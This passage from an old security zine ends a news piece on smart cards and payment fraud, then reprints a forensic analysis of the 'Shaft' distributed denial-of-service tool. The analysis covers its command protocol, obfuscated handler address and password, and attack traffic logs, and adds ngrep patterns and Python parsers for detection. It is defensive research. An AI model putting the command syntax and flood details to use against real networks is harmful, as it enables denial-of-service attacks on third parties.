.In those trials, people still needed to carry around spare change anyway,. said Don Davis, editor of Card Technology Magazine. .They didn’t really solve a problem for people. Now with the Internet, that changes things. There is a real problem to be solved with smart cards.. And there appears to finally be momentum behind the chip-enabled cards. Microsoft and Sun are currently battling over the operating system used to run the cards, and Windows 2000 includes native support for the technology. But perhaps the biggest leap forward came last year, when American Express announced .Blue,. the first widely distributed smart card in the United States. Blue is a hybrid; it still has the old-fashioned magnetic strip and can be used as a traditional credit card. But the embedded chip can be used for online purchases, and it also can be updated with new software. Part of the fresh promise for smart cards comes from the changing economics in the industry. Card readers, which must be connected to every PC if smart cards are to be used, are now cheap enough to be given away. That’s exactly what American Express decided to do when it launched .Blue. last year. .We see a lot of promise to the technology. There is a real customer need out there,. said Molly Fause, American Express spokesperson. BABY STEPS Still, .Blue. is just a toe in the water. Currently, the chip only adds convenience — it lets cardholders open a .digital wallet,. including billing information, with a single swipe. But it is not used by merchants to positively identify consumers; instead, the old-fashioned number is used, and it can be stolen and exploited just like traditional cards. And that’s been the problem for smart cards all along — while European governments and institutions have aggressively supported the technology (for example, Germany has distributed 80 million cards to all users in its health care system), U.S. companies have taken baby steps. Davis points out that U.S. 
adoption is still likely to be among the slowest in the world. With aggressive initiatives in France and Germany already, he said most of Europe will have converted to smart cards by 2005, with major Latin American countries following soon after. Still, the American Express initiative, while tepid, is important. The company wouldn’t say how many Blue cards have been issued; Faust would only say the company has received twice as many applications as anticipated. Analyst Do said she experts 1.5 million Blue cards to be in consumers’ hands by year’s end. .Believe me, the rest of the issuers in the U.S. are closely following what American Express is doing,. he said. The real goal, he said, is to ply consumers with coupons and loyalty points they can download onto smart cards, which will make them an attractive proposition. .If American Express figures that out, the rest of the industry will react quickly.. Still, getting Internet users to add hardware to their existing systems is a tremendous challenge. Davis speculates that many Blue owners don’t bother to hook up the card reader, for example. And Do goes farther, suggesting that the need to add a card reader makes smart cards a non-starter in the consumer space. But others say the shift will be swift, once consumers are convinced about the benefits of smart cards. .The last paradigm shift I would liken this to is the mouse,. said Rick McNeef, vice president of corporate development at Cybersafe Inc. .How long did it take us to get a mouse in conjunction with every keyboard?. He also thinks credit cards have built-in obsolescence, since they all have an expiration date, and most of our renewal cards will have chips inside. .Whatever you have in your wallet right now, the expiration date is three years or less. There’s an automatic replacement anyway.. SET MAKES A COMEBACK Additional hardware isn’t the only available method for proving someone is who they say they are on the Internet. 
The SET (secure electronic transactions) protocol accomplishes that goal through software. In SET, each customer receives a unique digital certificate, the cyberworld equivalent of a real-life signature. The certificate is .wrapped. around each transaction, and unwrapped by banks at the other end — no more anonymous commerce. .It transposes the physical world model into cyberspace,. said Orfie, speaking on behalf of SETCo. With each transaction, the consumer and the merchant must prove they are who they say they are, using the special SET digital authentication. That gives the bank an .irrefutable audit trail,. meaning criminals could be traced. More important, it satisfies the bank’s requirement for a signature on each transaction, meaning merchants won’t receive those fraud chargebacks that are currently a part of doing business online. But SET, like smart cards, has been slow to get off the ground. First tested in 1996, the standard appeared to be dead in the water last year. The SETCo.org Web site lists only about 25 participating merchants. The extra decryption processes proved slow and cumbersome; standards weren’t set, and big e-commerce companies went with the now-familiar .SLL. instead. The fear when e-commerce was first introduced was that ingenious card thieves would listen in on data being slung around the Internet and pick off credit card information as it went by, much like a wire tap. So, much attention was given to Secure Socket Layer, or SSL, technology, which encrypts the information while it’s in transit. But SSL says nothing about who’s at either end of the transaction. And unfortunately, cyber-eavesdropping has turned out to be a non-issue. The problems begin when the card number arrives at the merchant, who decrypts it. But the recent surge of high-profile credit card thefts, SET and its authentication capabilities are getting a new life, some say. . MSNBC research .We’ve anticipated this problem, which is now rearing its ugly little head,. 
Orfie said. .We’re saying we have a solution.. Since SET requires a much less costly infrastructure upgrade, it may be the biggest benefactor from the slew of hack attacks, Analyst Do said. .It’s getting up and dusting itself off and starting to walk again,. she said. .Online hacking will definitely promote some kind of network security rather than smart cards.. STORES AREN’T BANKS With either a hardware or a software solution, most experts say that one fundamental change to the current payments system is required. Today, merchants are forced to act like banks. They are acquiring and storing personal financial records — namely, credit cards. SET and any of the various smart card proposals can take this banking role away from retailers. In these new systems, consumers who hit .submit. on a Web site can send their purchase request to their own bank. Their bank then gives the money to the e-commerce store, along with some kind of unique identifying information. But personal bank account numbers, or credit card numbers, are never sent to the Web site. .The best place for the card to be is to remain in the banking system,. said Gerry Gay, vice president of sales and marketing at SafeTpay.com, Inc. His company recently launched a numeric keypad/card reader that acts like a mini-ATM when attached to a personal computer. The card reader immediately encrypts PIN numbers and card numbers and sends the data directly to banks. Merchants only receive their money and a tracking number. .You eliminate another arena where the data can be compromised,. Gay said. .As things are, you’re entrusting your card data to someone who’s outside the payment system.. OLD-FASHIONED BARN RAISING Still, even with the increased impetus supplied by cybercrooks, smart cards or any other payment solution won’t take over overnight. Old habits — at banks, merchants, and among consumers — die hard. Even if those old habits are costly. .The devil you know is better than the devil you don’t know,. 
Gay said, describing his company’s challenge in convincing banks and merchants to support his system. But no fright over fraud can overcome the challenges of an upgrade — in the case of smart cards, Analyst Do thinks a complete overhaul of the system will require $15 billion. Combine that with the fundamental change either SET or smart cards would hoist on consumers, and you have some formidable obstacles. That makes Barrett, of the Internet Fraud Prevention Advisory Council, leery. .A lot of these things create issues for consumers. They’re moving the pain onto consumers and taking it away from merchants, and that’s not going to work,. said Barrett, also an executive at Vitessa Corp., an online payment company. That’s why he thinks a very low-tech solution is needed to deal with credit card crooks. If Barrett had his way, companies like Amazon.com would open up their internal fraud databases to all e-merchants. Such an open policy would quickly create a list of suspicious e-mail addresses, Internet Service providers, and of course, credit card numbers. .I try to encourage people to think about fraud detection as a public good,. he said. The proposal has so far fallen on deaf ears, as most merchants see their fraud data as top-secret proprietary information. .Merchants on the Internet have tendency to want to wall off and control and not share their kownledge or incidents of fraud. .Amazon doesn’t compete as a fraud detection company. In so doing what they’re doing is hoarding information … If you live in a dangerous neighborhood, are you safe if you buy weapons? No. You still haven’t cleaned up the neighborhood. If the top 100 merchants on the Net put in place a technology that they could demonstrate immediately it’s hard for hackers, that would clean up the neighborhood.. His proposal is not so far, surprisingly, from the community-based solution proposed by the Saint of E-Commerce. 
.There should be an Internet Bureau of Commerce that can list every single person on the Internet who accepts credit cards and people should be invited to try to break in,. Curador said. .And if you can, then they are listed as unsafe.. Such lists already exist — but they are shared only among members of the Internet underground, and like Curador’s notorious Web page, come and go under cover of Internet anonymity. That means, for now, the bad guys appear to be much better at sharing information than the good guys. And while next-generation payment systems continue to languish in trials, criminals continue to order anything they want .with a number and a date.. @HWA 111.0 PSS: Shaft Distributed DoS tool analysis Sven Dietrich ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Source: Packetstorm Security http://packetstorm.securify.com/ UNFORMATTED = AS IS, WARNING C=SOURCE INCLUDED - Ed ================================================================================ An analysis of the ``Shaft'' distributed denial of service tool ================================================================================ Sven Dietrich NASA Goddard Space Flight Center Neil Long Oxford University David Dittrich University of Washington Copyright 2000. All rights reserved. March 13, 2000 -- 1. Introduction ------------------ This is an analysis of the "Shaft" distributed denial of service (DDoS) tool. Denial of service is a technique to deny access to a resource by overloading it, such as packet flooding in the network context. Denial of service tools have existed for a while, whereas distributed variants are relatively recent. The distributed nature adds the "many to one" relationship. Throughout this analysis, most actual host names have been modified or removed. -- 2. Historical overview ------------------------- "Shaft" belongs in the family of tools discussed earlier, such as Trinoo, TFN, Stacheldraht, and TFN2K. 
Like in those tools, there are handler (or master) and agent programs. The general concepts of these tools can be found in a Distributed Intruder Tools Workshop Report held in November 1999 at the Computer Emergency Response Team Coordination Center (CERT/CC) in Pittsburgh, Pennsylvania:

http://www.cert.org/reports/dsit_workshop.pdf

In chronological order, there are Trinoo, TFN, Stacheldraht, Shaft, and TFN2K. Trinoo, TFN, and Stacheldraht were analyzed in [5], [6], and [7] respectively. TFN2K was recently analyzed in [1]. In the first two months of 2000, DDoS attacks against major Internet sites (such as CNN, ZDNet, Amazon etc.) have brought these tools further into the limelight.

There are a few papers covering DDoS to be found at:

http://packetstorm.securify.com/distributed/
http://staff.washington.edu/dittrich/misc/ddos/
http://www.cert.org/advisories/CA-99-17-denial-of-service-tools.html

-- 3. Analysis
--------------

Shaftnode was recovered, initially in binary form, in late November 1999, then in source form for the agent. Distinctive features are the ability to switch handler servers and handler ports on the fly, making detection by intrusion detection tools difficult from that perspective, a "ticket" mechanism to link transactions, and the particular interest in packet statistics.

-- 3.1 The network: client(s)-->handler(s)-->agent(s)-->victim(s)
-----------------------------------------------------------------

The "Shaft" network is made up of one or more handler programs ("shaftmaster") and a large set of agents ("shaftnode"). The attacker uses a telnet program ("client") to connect to and communicate with the handlers. A "Shaft" network would look like this:

            +--------+                  +--------+
            | client |                  | client |
            +--------+                  +--------+
                |                           |
  . . . --------+-------------+-------------+--------------- . . .
                |             |             |
          +-----------+ +-----------+ +-----------+
          |  handler  | |  handler  | |  handler  |
          +-----------+ +-----------+ +-----------+
                |             |             |
  . . . ----+---+-----+-------+-+---------+-+-------+------- . . .
            |         |         |         |         |
        +-------+ +-------+ +-------+ +-------+ +-------+
        | agent | | agent | | agent | | agent | | agent |
        +-------+ +-------+ +-------+ +-------+ +-------+

-- 3.2 Network Communication
----------------------------

Client to handler(s):  20432/tcp
Handler to agent(s):   18753/udp
Agent to handler(s):   20433/udp

"Shaft" (in the analyzed version, 1.72) is modeled after Trinoo, in that communication between handlers and agents is achieved using the unreliable IP protocol UDP. See Stevens [18] for an extensive discussion of the TCP and UDP protocols. Remote control is via a simple telnet connection to the handler. "Shaft" uses "tickets" for keeping track of its individual agents. Both passwords and ticket numbers have to match for the agent to execute the request. A simple letter-shifting (Caesar cipher, see Schneier [17]) is in use.

-- 3.3 Commands
---------------

The command structure is divided into the agent and handler command syntax groups. The attacker interacts with the handler via a command line.

-- 3.3.1 Agent Command Syntax

Accepted by agent and replies generated back to the handler:

size            Size of the flood packets.
                Generates a "size" reply.
type <0|1|2|3>  Type of DoS to run: 0 UDP, 1 TCP, 2 UDP/TCP/ICMP, 3 ICMP
                Generates a "type" reply.
time            Length of DoS in seconds
                Generates a "time" reply.
own             Add victim to list of hosts to perform denial of service on
                Generates an "owning" reply.
end             Removes victim from list of hosts (see "own" above)
                Generates a "done" reply.
stat            Requests packet statistics from agent
                Generates a "pktstat" reply.
alive           Are you alive?
                Generates an "alive blah" reply.
switch          Switch the agent to a new handler and handler port
                Generates a "switching" reply.
pktres          Request packet results for that host at the end of the flood
                Generates a "pktres" reply.

Sent by agent:

new             Reporting for duty
pktres          Packets sent to the host identified by number

-- 3.3.2 Handler (shaftmaster) Command Syntax

Little is known about the handler, but this is a speculation, pieced together from clues, of what its command structure could look like:

mdos            Start a distributed denial of service attack (mdos = massive denial of service?).
                Sends out "own host" messages to all agents.
edos            End the above attack.
                Sends out "end host" messages to all agents.
time            Set the duration of the attack.
                Sends out "time" to all agents.
size            Set the packet size for the attack (8K maximum as seen in source).
                Sends out "size" to all agents.
type            Set the type of attack: UDP packet flooding, TCP SYN packet flooding, ICMP packet flooding, or all three (here BOTH = ICMP and IP protocols).
                Sends "type" to all agents.
+node           Add new agents
-node           Remove agents from pool
ns              Perform a DNS lookup
lnod            List all agents
ltic            List all tickets (transactions?)
pkstat          Show total packet statistics for agents
                Sends out "stat" request to all agents.
alive           Send an "alive" to all agents. A possible argument to alive is "hi"
stat            Show status?
switch          Become the handler for the agents
                Sends "switch" to all agents.
ver             Show version
exit

-- 3.4 Password protection
--------------------------

After connecting to the handler using the telnet client, the attacker is prompted with "login:". Too little is known about the handler or its encryption method for logging in. A cleartext connection to the handler port is obviously a weakness.

-- 3.5 Detection
----------------

-- 3.5.1 Binaries and their behavior

As with previous DDoS tools, the methods used to install the handler/agent will be the same as installing any program on a compromised Unix system, with all the standard options for concealing the programs and files (e.g., use of hidden directories, "root kits", kernel modules, etc.) The reader is referred to Dittrich's Trinoo analysis [5] for a description of possible installation methods of this type of tool.

Precautions have been taken to hide the default handler in the binary code. In the analyzed code, the default handler is defined as follows:

#define MASTER "23:/33/75/28"

which would translate into 129.22.64.17 (electrochem1.echem.cwru.edu) using the same simple cipher mentioned above. Port numbers are munged before actual use, e.g.

#define MASTER_PORT 20483

is really port 20433. All these techniques intend to hide the critical information from prying eyes performing forensics on the code. The program itself tries to hide itself as a legitimate Unix process (httpd in the default configuration). Looking at strings in the shaftnode application reveals the following:

> strings -n 3 shaftnode
pktres
switch
alive
stat
end
own
time
type
size
httpd
23:/33/75/28
Unable to fork. (do it manually)
shift
new %s
size %s %s %s %s
type %s %s %s %s
time %s %s %s %s
owning %s %s %s %s
switched %s %s %s
done %s %s %s %s
pktstat %s %s %s %lu
alive %s %s %s blah
%d.%d.%d.%d
Error sending tcp packet from %s:%i to %lu:%i
pktres %s %i %i %lu

Upon launch, the "Shaft" agent (the "shaftnode") reports back to its default handler (its "shaftmaster") by sending a "new" command carrying the shifted password. For the default password of "shift" found in the analyzed code, this would be "tijgu". Therefore a new agent would send out "new tijgu", and all subsequent messages would carry that password in them. Only in one case does the agent shift in the opposite direction for one particular command, e.g. "pktres rghes". It is unclear at the moment whether this is intentional or not.

Incoming commands arrive in the format "command" followed by the password and the socket/ticket values. For most commands, the password and socket/ticket need to have the right magic in order to generate a reply and the command to be executed.

Message flow diagram between handler H and agent A:

Initial phase:

    A -> H: "new", f(password)

Running loop:

    H -> A: cmd, f(password), [args], Na, Nb
    A -> H: cmdrep, f(password), Na, Nb, [args]

- f(X) is the Caesar cipher function on X
- Na, Nb are numbers (tickets, socket numbers)
- cmd, cmdrep are commands and command acknowledgments
- args are command arguments

The flooding occurs in bursts of 100 packets per host, with the source port and source address randomized. This number is hard-coded, but it is believed that more flexibility can be added. Whereas the source port spoofing only works if the agent is running as a root privileged process, the author has added provisions for packet flooding using the UDP protocol and with the correct source address in the case the process is running as a simple user process.

It is noteworthy that the random function is not properly seeded, which may lead to predictable source port sequences and source host IP sequences.

    Source port = (rand() % (65535-1024)) + 1024

where % is the mathematical 'mod' operator. This will generate source ports greater than 1024 at all times.

    Source IP = rand()%255.rand()%255.rand()%255.rand()%255

The source IP numbers can (and will) contain a zero in the leading octet.

Additionally, the sequence number for all TCP packets is fixed, namely 0x28374839, which helps with respect to detection at the network level. The ACK and URGENT flags are randomly set, except on some platforms. Destination ports for TCP and UDP packet floods are randomized.

The client must choose the duration ("time"), size of packets, and type of packet flooding directed at the victim hosts. Each set of hosts has its own duration, which gets divided evenly across all hosts. This is unlike TFN [2] which forks an individual process for each victim host. For the type, the client can select UDP, TCP SYN, ICMP packet flooding, or the combination of all three.
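The two facts above that matter most for forensics on a captured shaftnode, the one-position letter shift that hides the handler address and password, and the fixed layout of the UDP control messages, can be turned into a small triage helper. The following is an added example written for this zine entry; it is not code from the Shaft analysis or from the tool. It assumes the "letter shifting" of section 3.2 is a plain ASCII shift of one position (+1 when a string is stored or sent, so -1 recovers it), which is what the analysis' own pairs ("shift" -> "tijgu", "23:/33/75/28" -> 129.22.64.17, "pktres rghes") imply, and the sample payloads are constructed from the printf templates in the strings dump rather than captured traffic.

```python
"""Decode Shaft's obfuscated constants and recognise its control messages.

Added example, not code from the Shaft analysis or the tool itself.
Assumption: the "Caesar cipher" is an ASCII shift of one position
(+1 on the wire / in the binary, -1 to recover the plaintext).
"""


def caesar(text, shift):
    """Shift every character's ASCII code by `shift` (Shaft uses +/-1)."""
    return "".join(chr(ord(ch) + shift) for ch in text)


# Values quoted from the analysed binary in section 3.5.1.
OBFUSCATED_MASTER = "23:/33/75/28"
DEFAULT_PASSWORD = "shift"


def decode_master(obfuscated=OBFUSCATED_MASTER):
    """Recover the default handler address hidden in the MASTER define."""
    return caesar(obfuscated, -1)        # -> "129.22.64.17"


def wire_password(password=DEFAULT_PASSWORD):
    """The form in which the agent puts the password on the wire."""
    return caesar(password, +1)          # "shift" -> "tijgu"


# Command words from section 3.3.1 and the reply templates in the strings dump.
HANDLER_TO_AGENT = {"size", "type", "time", "own", "end", "stat",
                    "alive", "switch", "pktres"}
AGENT_TO_HANDLER = {"new", "size", "type", "time", "owning", "switched",
                    "done", "pktstat", "alive", "pktres"}
SHAFT_COMMANDS = HANDLER_TO_AGENT | AGENT_TO_HANDLER


def parse_shaft_message(payload, known_passwords=(DEFAULT_PASSWORD,)):
    """Describe a UDP payload that looks like a Shaft message, or return None.

    Layout (section 3.5.1 and the flow diagram): the command word, then
    f(password), then socket/ticket numbers and any arguments.
    """
    parts = payload.split()
    if len(parts) < 2 or parts[0] not in SHAFT_COMMANDS:
        return None
    cmd, token = parts[0], parts[1]
    # Normal direction is +1 on the wire, so decode with -1.  "pktres" is the
    # one command the analysis saw shifted the other way ("pktres rghes").
    password = caesar(token, +1 if cmd == "pktres" else -1)
    return {
        "command": cmd,
        "password": password,
        "known_password": password in known_passwords,
        "fields": parts[2:],             # Na, Nb and arguments, left as text
    }


def scan_payloads(payloads):
    """Return [(payload, command)] for every payload that parses as Shaft."""
    hits = []
    for payload in payloads:
        msg = parse_shaft_message(payload)
        if msg is not None:
            hits.append((payload, msg["command"]))
    return hits


# Constructed sample payloads; 198.51.100.20 is documentation address space.
SAMPLE_PAYLOADS = [
    "new tijgu",                        # agent reporting for duty
    "own tijgu 198.51.100.20 4 7",      # handler -> agent: cmd, f(pw), args, Na, Nb
    "owning tijgu 4 7 198.51.100.20",   # agent -> handler: cmdrep, f(pw), Na, Nb, args
    "pktstat tijgu 4 7 100",            # agent -> handler: packet count
    "pktres rghes 4 7 100",             # the reverse-shifted exception
    "GET / HTTP/1.0",                   # ordinary traffic, ignored
]

if __name__ == "__main__":
    print("default handler:", decode_master())
    print("password on the wire:", wire_password())
    for payload, cmd in scan_payloads(SAMPLE_PAYLOADS):
        print(f"{cmd:8s} <- {payload!r}")
```

Because the shift is the same for every constant, the same `caesar(..., -1)` call recovers whatever replaces the default handler string in a later build; the port munging noted above (20483 standing for 20433) is not a character shift and is deliberately left out, since the analysis does not state the transform.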
Even though there is potential of having a different type and packet size for each set of victim hosts, this feature is not exploited in this version. The author of "Shaft" seems to have a particular interest in statistics, namely packet generation rates of its individual agents. The statistics on packet generation rates are possibly used to determine the "yield" of the DDoS network as a whole. This would allow the attacker to stop adding hosts to the attack network when it reached the necessary size to overwhelm the victim network, and to know when it is necessary to add more agents to compensate for loss of agents due to attrition during an attack (as the agent systems are identified and taken off-line.) Currently, the ability to switch host IP and port for the handler exists, but the listening port for the agent remains the same. It is foreseeable that this will change in the future. -- 3.5.2 A sample attack In this section we will look at a practical example of an attack carried out with the "Shaft" distributed denial of service attack tool, as seen from the attacking network perspective. 
The shaftnode agent when in use, as seen by "lsof" [10]:

   # lsof -c shaftnode
   COMMAND     PID USER   FD   TYPE     DEVICE   SIZE   NODE NAME
   shaftnode 13489 root  cwd   VDIR        0,0    400      2 /tmp
   shaftnode 13489 root  txt   VREG        0,0  19492     10 /tmp (swap)
   shaftnode 13489 root  txt   VREG       32,0 662764 182321 /usr/lib/libc.so.1
   shaftnode 13489 root  txt   VREG       32,0  17480 210757 /usr/platform/sun4u/lib/libc_psr.so.1
   shaftnode 13489 root  txt   VREG       32,0 566700 182335 /usr/lib/libnsl.so.1
   shaftnode 13489 root  txt   VREG       32,0  39932 182348 /usr/lib/libw.so.1
   shaftnode 13489 root  txt   VREG       32,0  15720 182334 /usr/lib/libmp.so.1
   shaftnode 13489 root  txt   VREG       32,0  15720 182327 /usr/lib/libintl.so.1
   shaftnode 13489 root  txt   VREG       32,0  68780 182342 /usr/lib/libsocket.so.1
   shaftnode 13489 root  txt   VREG       32,0   2564 182324 /usr/lib/libdl.so.1
   shaftnode 13489 root  txt   VREG       32,0 137160 182315 /usr/lib/ld.so.1
   shaftnode 13489 root   0u  inet 0x507dc770  0t116    TCP hostname:ftp->electrochem1.echem.cwru.edu:53982 (CLOSE_WAIT)
   shaftnode 13489 root   1u  inet 0x507dc770  0t116    TCP hostname:ftp->electrochem1.echem.cwru.edu:53982 (CLOSE_WAIT)
   shaftnode 13489 root   2u  inet 0x507dc770  0t116    TCP hostname:ftp->electrochem1.echem.cwru.edu:53982 (CLOSE_WAIT)
   shaftnode 13489 root   3u  inet 0x5032c7d8    0t0    UDP *:18753 (Idle)

As one can see, the agent is waiting to receive commands on its default UDP port number 18753. The TCP connection back to the handler remains unexplained to date.
Packet flows:

   Date Time           Protocol Source IP/Port       Flow Destination IP/Port
   Sun 11/28 21:39:22  tcp      129.22.64.17.53982   <->  x.x.x.x.21
   Sun 11/28 21:39:56  udp      x.x.x.x.33198        ->   129.22.64.17.20433
   Sun 11/28 21:45:20  udp      129.22.64.17.1765    ->   x.x.x.x.18753
   Sun 11/28 21:45:20  udp      x.x.x.x.33199        ->   129.22.64.17.20433
   Sun 11/28 21:45:59  udp      129.22.64.17.1866    ->   x.x.x.x.18753
   Sun 11/28 21:45:59  udp      x.x.x.x.33200        ->   129.22.64.17.20433
   Sun 11/28 21:45:59  udp      129.22.64.17.1968    ->   x.x.x.x.18753
   Sun 11/28 21:45:59  udp      129.22.64.17.1046    ->   x.x.x.x.18753
   Sun 11/28 21:45:59  udp      129.22.64.17.1147    ->   x.x.x.x.18753
   Sun 11/28 21:45:59  udp      129.22.64.17.1248    ->   x.x.x.x.18753
   Sun 11/28 21:45:59  udp      129.22.64.17.1451    ->   x.x.x.x.18753
   Sun 11/28 21:46:00  udp      x.x.x.x.33201        ->   129.22.64.17.20433
   Sun 11/28 21:46:00  udp      x.x.x.x.33202        ->   129.22.64.17.20433
   Sun 11/28 21:46:01  udp      x.x.x.x.33203        ->   129.22.64.17.20433
   Sun 11/28 21:48:37  udp      129.22.64.17.1037    ->   x.x.x.x.18753
   Sun 11/28 21:48:37  udp      129.22.64.17.1239    ->   x.x.x.x.18753
   Sun 11/28 21:48:37  udp      129.22.64.17.1340    ->   x.x.x.x.18753
   Sun 11/28 21:48:37  udp      129.22.64.17.1442    ->   x.x.x.x.18753
   Sun 11/28 21:48:38  udp      x.x.x.x.33204        ->   129.22.64.17.20433
   Sun 11/28 21:48:38  udp      x.x.x.x.33205        ->   129.22.64.17.20433
   Sun 11/28 21:48:38  udp      x.x.x.x.33206        ->   129.22.64.17.20433
   Sun 11/28 21:48:56  udp      129.22.64.17.1644    ->   x.x.x.x.18753
   Sun 11/28 21:48:56  udp      x.x.x.x.33207        ->   129.22.64.17.20433
   Sun 11/28 21:49:59  udp      x.x.x.x.33208        ->   129.22.64.17.20433
   Sun 11/28 21:50:00  udp      x.x.x.x.33209        ->   129.22.64.17.20433
   Sun 11/28 21:50:14  udp      129.22.64.17.1747    ->   x.x.x.x.18753
   Sun 11/28 21:50:14  udp      x.x.x.x.33210        ->   129.22.64.17.20433

There is quite some activity between the handler and the agent, as they go through the command request and acknowledgement phases. There was also what appeared to be testing of the impact on the local network itself with ICMP packet flooding, for which we omit the data here due to size limitations.
Let us look at the individual phases from a later attack.

Setup and configuration phase:

   date        time      src           dest          dest-port  command
   4 Dec 1999  18:06:40  129.22.64.17  x.x.x.x       18753      alive tijgu hi 5 8170
   4 Dec 1999  18:09:14  129.22.64.17  x.x.x.x       18753      time tijgu 700 5 6437
   4 Dec 1999  18:09:14  x.x.x.x       129.22.64.17  20433      time tijgu 5 6437 700
   4 Dec 1999  18:09:16  129.22.64.17  x.x.x.x       18753      size tijgu 4096 5 8717
   4 Dec 1999  18:09:16  x.x.x.x       129.22.64.17  20433      size tijgu 5 8717 4096
   4 Dec 1999  18:09:23  129.22.64.17  x.x.x.x       18753      type tijgu 2 5 9003

The handler issues an "alive" command, and says "hi" to its agent, assigning a socket number of "5" and a ticket number of 8170. We will see that this "socket number" will persist throughout this attack. A time period of 700 seconds is assigned to the agent, which is acknowledged. A packet size of 4096 bytes is specified, which is again confirmed. The last line indicates the type of attack, in this case "the works", i.e. UDP, TCP SYN and ICMP packet flooding combined. Failure to specify the type would make the agent default to UDP packet flooding.
Now the list of hosts to attack, and the ones for which statistics are wanted on completion:

   date        time      src           dest          dest-port  command
   4 Dec 1999  18:09:24  129.22.64.17  x.x.x.x       18753      own tijgu 207.229.143.6 5 5256
   4 Dec 1999  18:09:24  x.x.x.x       129.22.64.17  20433      owning tijgu 5 5256 207.229.143.6
   4 Dec 1999  18:09:24  129.22.64.17  x.x.x.x       18753      pktres tijgu 207.229.143.6 5 1993
   4 Dec 1999  18:09:24  129.22.64.17  x.x.x.x       18753      own tijgu 24.7.231.128 5 78
   4 Dec 1999  18:09:24  129.22.64.17  x.x.x.x       18753      pktres tijgu 24.218.58.101 5 8845
   4 Dec 1999  18:09:24  129.22.64.17  x.x.x.x       18753      own tijgu 18.85.13.107 5 6247
   4 Dec 1999  18:09:25  129.22.64.17  x.x.x.x       18753      own tijgu 24.218.52.44 5 4190
   4 Dec 1999  18:09:25  129.22.64.17  x.x.x.x       18753      own tijgu 207.175.72.15 5 2376
   4 Dec 1999  18:09:25  x.x.x.x       129.22.64.17  20433      owning tijgu 5 78 24.7.231.128
   4 Dec 1999  18:09:26  x.x.x.x       129.22.64.17  20433      owning tijgu 5 6247 18.85.13.107
   4 Dec 1999  18:09:27  x.x.x.x       129.22.64.17  20433      owning tijgu 5 4190 24.218.52.44
   4 Dec 1999  18:09:28  x.x.x.x       129.22.64.17  20433      owning tijgu 5 2376 207.175.72.15
   4 Dec 1999  18:21:04  x.x.x.x       129.22.64.17  20433      pktres rghes 5 1993 51600
   4 Dec 1999  18:21:04  x.x.x.x       129.22.64.17  20433      pktres rghes 0 0 51400
   4 Dec 1999  18:21:07  x.x.x.x       129.22.64.17  20433      pktres rghes 0 0 51500
   4 Dec 1999  18:21:07  x.x.x.x       129.22.64.17  20433      pktres rghes 0 0 51400
   4 Dec 1999  18:21:07  x.x.x.x       129.22.64.17  20433      pktres rghes 0 0 51400

Now that all other parameters are set, the handler issues several "own" commands, in effect specifying the victim hosts. Those commands are acknowledged by the agent with an "owning" reply. The flooding starts as soon as the first victim host gets added. The handler also requests packet statistics from the agents for certain victim hosts (e.g. "pktres tijgu 207.229.143.6 5 1993"). Note that the reply comes back with the same identifiers ("5 1993") at the end of the 700 second packet flood, indicating that 51600 sets of packets were sent.
One should realize that, if successful, this means 51600 x 3 packets, due to the configuration of all three (UDP, TCP, and ICMP) packet types. In turn, this results in roughly 220 4096-byte packets per second per host, or about 900 kilobytes per second per victim host from this agent alone, and about 4.5 megabytes per second total for this little exercise.

Note the reverse shift ("shift" becomes "rghes", rather than "tijgu") for the password on the packet statistics.

-- 3.5.3 Detection at the network level

Scanning the network for open port 20432 will reveal the presence of a handler on your LAN. For detecting idle agents, one could write a program similar to George Weaver's trinoo detector. Sending out "alive" messages with the default password to all nodes on a network on the default UDP port 18753 will generate traffic back to the detector, making the agent believe the detector is a handler.

This program does not provide for code updates (like TFN or Stacheldraht). This may imply "rcp" or "ftp" connections during the initial intrusion phase (see also [5]).

The program uses UDP traffic for its communication between the handlers and the agents. Considering that the traffic is not encrypted, it can easily be detected based on certain keywords. Performing an "ngrep" [11] for the keywords mentioned in the syntax sections (3.3.1 and 3.3.2) will locate the control traffic, and looking for TCP packets with sequence numbers of 0x28374839 may locate the TCP SYN packet flood traffic. Source ports are always above 1024, and source IP numbers can include zeroes in the leading octet.

Strings in this control traffic can be detected with the "ngrep" program using the same technique shown in [5], [6], and [7]. For example,

   # ngrep -i -x "alive tijgu" udp
   # ngrep -i -x "pktres|pktstat" udp

will locate the control traffic between the handler and the agent, independently of the port number used.
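The message layout from the flow diagram in 3.5.1, the captured session in 3.5.2 and the keyword-based detection of 3.5.3 can be tied together in a small parser. The following is an added example and not code from the Shaft analysis or from the tool itself; it assumes the layouts and the +1/-1 Caesar shifts exactly as the captures above show them, and the mapping of type code 2 to three packet kinds is taken from the "the works" remark, with other codes assumed to be a single kind.

```python
"""Shaft control-traffic parser and yield estimate. Added example, not code from
the Shaft analysis or its tools. Layout follows the flow diagram in 3.5.1:
handler->agent is  cmd f(pw) [args] Na Nb,  agent->handler is  cmd f(pw) Na Nb
[args], with f a Caesar shift of +1 ("shift" -> "tijgu") or -1 ("rghes")."""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

SHAFT_AGENT_PORT = 18753    # agent listens here for handler commands
SHAFT_HANDLER_PORT = 20433  # handler listens here for agent replies
DEFAULT_PASSWORD = "shift"  # default password recovered in the analysis
# Assumption: the page documents only type code 2 ("the works": UDP, TCP SYN and
# ICMP together); any other code is treated here as a single packet kind.
PACKET_KINDS = {2: 3}


def caesar(text: str, shift: int) -> str:
    """Shift lowercase letters by `shift` places; other characters pass through."""
    return "".join(chr((ord(c) - 97 + shift) % 26 + 97) if "a" <= c <= "z" else c
                   for c in text)


def deobfuscate(token: str) -> Tuple[str, int]:
    """Return (password, shift the sender applied). Both shifts seen in the
    captures are tried; the one giving the default password wins, otherwise the
    +1 convention of the handler->agent traffic is assumed."""
    for sender_shift in (1, -1):
        candidate = caesar(token, -sender_shift)
        if candidate == DEFAULT_PASSWORD:
            return candidate, sender_shift
    return caesar(token, -1), 1


@dataclass
class ShaftMsg:
    direction: str   # "handler->agent" or "agent->handler"
    cmd: str
    password: str    # de-obfuscated
    shift: int       # Caesar shift the sender applied (+1 or -1)
    socket_no: int   # Na
    ticket: int      # Nb
    args: List[str] = field(default_factory=list)


def parse_message(dport: int, payload: str) -> Optional[ShaftMsg]:
    """Parse one UDP payload; the destination port decides which layout applies."""
    tok = payload.split()
    if len(tok) < 4:
        return None
    if dport == SHAFT_AGENT_PORT:
        direction, args, na, nb = "handler->agent", tok[2:-2], tok[-2], tok[-1]
    elif dport == SHAFT_HANDLER_PORT:
        direction, na, nb, args = "agent->handler", tok[2], tok[3], tok[4:]
    else:
        return None
    if not (na.isdigit() and nb.isdigit()):
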